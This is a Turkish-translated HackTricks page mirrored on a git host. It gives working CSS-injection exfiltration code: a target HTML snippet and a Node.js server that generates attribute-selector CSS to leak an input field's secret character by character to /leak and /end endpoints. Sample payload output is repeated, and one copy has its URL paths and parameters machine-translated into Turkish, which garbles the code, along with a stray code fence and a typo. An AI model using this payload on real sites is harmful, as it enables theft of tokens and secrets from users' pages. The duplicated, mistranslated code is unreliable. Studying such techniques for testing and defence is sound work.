Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/xs-search/css-injection/css-injection-code.md
Translator workflow 6cb783ece2 Translated to Turkish
2024-02-10 18:14:16 +00:00

13 KiB
Raw Blame History

CSS Enjeksiyon Kodu

htARTE (HackTricks AWS Kırmızı Takım Uzmanı) ile sıfırdan kahraman olmak için AWS hackleme öğrenin!

HackTricks'i desteklemenin diğer yolları:

En önemli güvenlik açıklarını bulun, böylece daha hızlı düzeltebilirsiniz. Intruder saldırı yüzeyinizi takip eder, proaktif tehdit taramaları yapar, API'lerden web uygulamalarına ve bulut sistemlerine kadar tüm teknoloji yığınınızda sorunları bulur. Ücretsiz deneyin bugün.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

{% code title="hedef.html" %}

<!doctype html>
<body>
<div><article><div><p><div><div><div><div><div>
<input type="text" value="1234567890">
<style>
@import url('//localhost:5001/start?');
</style>

{% code title="server.js" %}

const http = require('http');
const url = require('url');

// Port to exfiltrate to
const port = 5001;
// Host to exfiltrate to
const HOSTNAME = "http://localhost:5001";
const DEBUG = false;

var prefix = "", postfix = "";
var pending = [];
var stop = false, ready = 0, n = 0;

const requestHandler = (request, response) => {
let req = url.parse(request.url, url);
log('\treq: %s', request.url);

//If stop, leakeage is finished
if (stop) return response.end();

switch (req.pathname) {
// This only launched when starting the leakeage
case "/start":
genResponse(response);
break;

// Everytime something is leaked
case "/leak":
response.end();
// If response comes with a pre, then we leaked some preffix s(E)cret
if (req.query.pre && prefix !== req.query.pre) {
prefix = req.query.pre;

// If response comes with a post, then we leaked some suffix secre(T)
} else if (req.query.post && postfix !== req.query.post) {
postfix = req.query.post;
} else {
break;
}

// Always a pre and a post response must arrived before responding the "next" @import (which is waiting for response)
if (ready == 2) {
genResponse(pending.shift());
ready = 0;
} else {
ready++;
log('\tleak: waiting others...');
}
break;

// While waiting for a pre and a post, the next @import is waiting to be responded
// by a new generated payload with another "pre" and "post"
case "/next":
if (ready == 2) {
genResponse(respose);
ready = 0;
} else {
pending.push(response);
ready++;
log('\tquery: waiting others...');
}
break;

// Called when the secret is leaked
case "/end":
stop = true;
console.log('[+] END: %s', req.query.token);

default:
response.end();
}
}

const genResponse = (response) => {
// Verbose output to know what do we know
console.log('...pre-payoad: ' + prefix);
console.log('...post-payoad: ' + postfix);

// Payload generation, you have an example of what is generated below
let css = '@import url('+ HOSTNAME + '/next?' + Math.random() + ');\n' +
[0,1,2,3,4,5,6,7,8,9,'a','b','c','d','e','f'].map(e => ('input[value$="' + e + postfix + '"]{--e'+n+':url(' + HOSTNAME + '/leak?post=' + e + postfix + ')}')).join('') +
'div '.repeat(n) + 'input{background:var(--e'+n+')}' +
[0,1,2,3,4,5,6,7,8,9,'a','b','c','d','e','f'].map(e => ('input[value^="' + prefix + e + '"]{--s'+n+':url(' + HOSTNAME + '/leak?pre=' + prefix + e +')}')).join('') +
'div '.repeat(n) + 'input{border-image:var(--s'+n+')}' +
'input[value='+ prefix + postfix + ']{list-style:url(' + HOSTNAME + '/end?token=' + prefix + postfix + '&)};';

response.writeHead(200, { 'Content-Type': 'text/css'});
response.write(css);
response.end();
n++;
}


// Server listening
const server = http.createServer(requestHandler)

server.listen(port, (err) => {
if (err) {
return console.log('[-] Error: something bad happened', err);
}
console.log('[+] Server is listening on %d', port);
})

function log() {
if (DEBUG) console.log.apply(console, arguments);
}

/*
HTTP/1.1 200 OK
Content-Type: text/css
Date: Fri, 01 Apr 2022 14:35:39 GMT
Connection: close
Content-Length: 2149

@import url(http://localhost:5001/next?0.7834603960990516);
input[value$="0"]{--e0:url(http://localhost:5001/leak?post=0)}
input[value$="1"]{--e0:url(http://localhost:5001/leak?post=1)}
input[value$="2"]{--e0:url(http://localhost:5001/leak?post=2)}
input[value$="3"]{--e0:url(http://localhost:5001/leak?post=3)}
input[value$="4"]{--e0:url(http://localhost:5001/leak?post=4)}
input[value$="5"]{--e0:url(http://localhost:5001/leak?post=5)}
input[value$="6"]{--e0:url(http://localhost:5001/leak?post=6)}
input[value$="7"]{--e0:url(http://localhost:5001/leak?post=7)}
input[value$="8"]{--e0:url(http://localhost:5001/leak?post=8)}
input[value$="9"]{--e0:url(http://localhost:5001/leak?post=9)}
input[value$="a"]{--e0:url(http://localhost:5001/leak?post=a)}
input[value$="b"]{--e0:url(http://localhost:5001/leak?post=b)}
input[value$="c"]{--e0:url(http://localhost:5001/leak?post=c)}
input[value$="d"]{--e0:url(http://localhost:5001/leak?post=d)}
input[value$="e"]{--e0:url(http://localhost:5001/leak?post=e)}
input[value$="f"]{--e0:url(http://localhost:5001/leak?post=f)}
input{background:var(--e0)}
input[value^="0"]{--s0:url(http://localhost:5001/leak?pre=0)}
input[value^="1"]{--s0:url(http://localhost:5001/leak?pre=1)}
input[value^="2"]{--s0:url(http://localhost:5001/leak?pre=2)}
input[value^="3"]{--s0:url(http://localhost:5001/leak?pre=3)}
input[value^="4"]{--s0:url(http://localhost:5001/leak?pre=4)}
input[value^="5"]{--s0:url(http://localhost:5001/leak?pre=5)}
input[value^="6"]{--s0:url(http://localhost:5001/leak?pre=6)}
input[value^="7"]{--s0:url(http://localhost:5001/leak?pre=7)}
input[value^="8"]{--s0:url(http://localhost:5001/leak?pre=8)}
input[value^="9"]{--s0:url(http://localhost:5001/leak?pre=9)}
input[value^="a"]{--s0:url(http://localhost:5001/leak?pre=a)}
input[value^="b"]{--s0:url(http://localhost:5001/leak?pre=b)}
input[value^="c"]{--s0:url(http://localhost:5001/leak?pre=c)}
input[value^="d"]{--s0:url(http://localhost:5001/leak?pre=d)}
input[value^="e"]{--s0:url(http://localhost:5001/leak?pre=e)}
input[value^="f"]{--s0:url(http://localhost:5001/leak?pre=f)}
input{border-image:var(--s0)}
input[value=]{list-style:url(http://localhost:5001/end?token=&)};
*/

/*
HTTP/1.1 200 OK
Content-Type: text/css
Date: Fri, 01 Apr 2022 14:35:39 GMT
Connection: close
Content-Length: 2149

@import url(http://localhost:5001/next?0.7834603960990516);
input[value$="0"]{--e0:url(http://localhost:5001/leak?post=0)}
input[value$="1"]{--e0:url(http://localhost:5001/leak?post=1)}
input[value$="2"]{--e0:url(http://localhost:5001/leak?post=2)}
input[value$="3"]{--e0:url(http://localhost:5001/leak?post=3)}
input[value$="4"]{--e0:url(http://localhost:5001/leak?post=4)}
input[value$="5"]{--e0:url(http://localhost:5001/leak?post=5)}
input[value$="6"]{--e0:url(http://localhost:5001/leak?post=6)}
input[value$="7"]{--e0:url(http://localhost:5001/leak?post=7)}
```css
input[value$="8"]{--e0:url(http://localhost:5001/leak?post=8)}
input[value$="9"]{--e0:url(http://localhost:5001/leak?post=9)}
input[value$="a"]{--e0:url(http://localhost:5001/leak?post=a)}
input[value$="b"]{--e0:url(http://localhost:5001/leak?post=b)}
input[value$="c"]{--e0:url(http://localhost:5001/leak?post=c)}
input[value$="d"]{--e0:url(http://localhost:5001/leak?post=d)}
input[value$="e"]{--e0:url(http://localhost:5001/leak?post=e)}
input[value$="f"]{--e0:url(http://localhost:5001/leak?post=f)}
input{background:var(--e0)}
input[value^="0"]{--s0:url(http://localhost:5001/leak?pre=0)}
input[value^="1"]{--s0:url(http://localhost:5001/leak?pre=1)}
input[value^="2"]{--s0:url(http://localhost:5001/leak?pre=2)}
input[value^="3"]{--s0:url(http://localhost:5001/leak?pre=3)}
input[value^="4"]{--s0:url(http://localhost:5001/leak?pre=4)}
input[value^="5"]{--s0:url(http://localhost:5001/leak?pre=5)}
input[value^="6"]{--s0:url(http://localhost:5001/leak?pre=6)}
input[value^="7"]{--s0:url(http://localhost:5001/leak?pre=7)}
input[value^="8"]{--s0:url(http://localhost:5001/leak?pre=8)}
input[value^="9"]{--s0:url(http://localhost:5001/leak?pre=9)}
input[value^="a"]{--s0:url(http://localhost:5001/leak?pre=a)}
input[value^="b"]{--s0:url(http://localhost:5001/leak?pre=b)}
input[value^="c"]{--s0:url(http://localhost:5001/leak?pre=c)}
input[value^="d"]{--s0:url(http://localhost:5001/leak?pre=d)}
input[value^="e"]{--s0:url(http://localhost:5001/leak?pre=e)}
input[value^="f"]{--s0:url(http://localhost:5001/leak?pre=f)}
input{border-image:var(--s0)}
input[value=]{list-style:url(http://localhost:5001/end?token=&)};
*/

input[value$="8"]{--e0:url(http://localhost:5001/sızıntı?gönderi=8)}
input[value$="9"]{--e0:url(http://localhost:5001/sızıntı?gönderi=9)}
input[value$="a"]{--e0:url(http://localhost:5001/sızıntı?gönderi=a)}
input[value$="b"]{--e0:url(http://localhost:5001/sızıntı?gönderi=b)}
input[value$="c"]{--e0:url(http://localhost:5001/sızıntı?gönderi=c)}
input[value$="d"]{--e0:url(http://localhost:5001/sızıntı?gönderi=d)}
input[value$="e"]{--e0:url(http://localhost:5001/sızıntı?gönderi=e)}
input[value$="f"]{--e0:url(http://localhost:5001/sızıntı?gönderi=f)}
input{background:var(--e0)}
input[value^="0"]{--s0:url(http://localhost:5001/sızıntı?ön=0)}
input[value^="1"]{--s0:url(http://localhost:5001/sızıntı?ön=1)}
input[value^="2"]{--s0:url(http://localhost:5001/sızıntı?ön=2)}
input[value^="3"]{--s0:url(http://localhost:5001/sızıntı?ön=3)}
input[value^="4"]{--s0:url(http://localhost:5001/sızıntı?ön=4)}
input[value^="5"]{--s0:url(http://localhost:5001/sızıntı?ön=5)}
input[value^="6"]{--s0:url(http://localhost:5001/sızıntı?ön=6)}
input[value^="7"]{--s0:url(http://localhost:5001/sızıntı?ön=7)}
input[value^="8"]{--s0:url(http://localhost:5001/sızıntı?ön=8)}
input[value^="9"]{--s0:url(http://localhost:5001/sızıntı?ön=9)}
input[value^="a"]{--s0:url(http://localhost:5001/sızıntı?ön=a)}
input[value^="b"]{--s0:url(http://localhost:5001/sızıntı?ön=b)}
input[value^="c"]{--s0:url(http://localhost:5001/sızıntı?ön=c)}
input[value^="d"]{--s0:url(http://localhost:5001/sızıntı?ön=d)}
input[value^="e"]{--s0:url(http://localhost:5001/sızıntı?ön=e)}
input[value^="f"]{--s0:url(http://localhost:5001/sızıntı?ön=f)}
input{border-image:var(--s0)}
input[value=]{list-style:url(http://localhost:5001/son?jeton=&)};
*/
{% endcode %}

<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>

En önemli güvenlik ıklarını bulun, böylece daha hızlı düzeltebilirsiniz. Intruder saldırı yüzeyinizi takip eder, proaktif tehdit taramaları yapar, API'lerden web uygulamalarına ve bulut sistemlerine kadar tüm teknoloji yığınınızda sorunları bulur. [**Ücretsiz deneyin**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) bugün.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

<details>

<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> ile sıfırdan kahraman olmak için AWS hackleme öğrenin<strong>!</strong></summary>

HackTricks'i desteklemenin diğer yolları:

* **Şirketinizi HackTricks'te reklam vermek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin, özel [**NFT'lerimizi**](https://opensea.io/collection/the-peass-family) görün
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi HackTricks ve HackTricks Cloud** github depolarına **PR göndererek paylaşın**.

</details>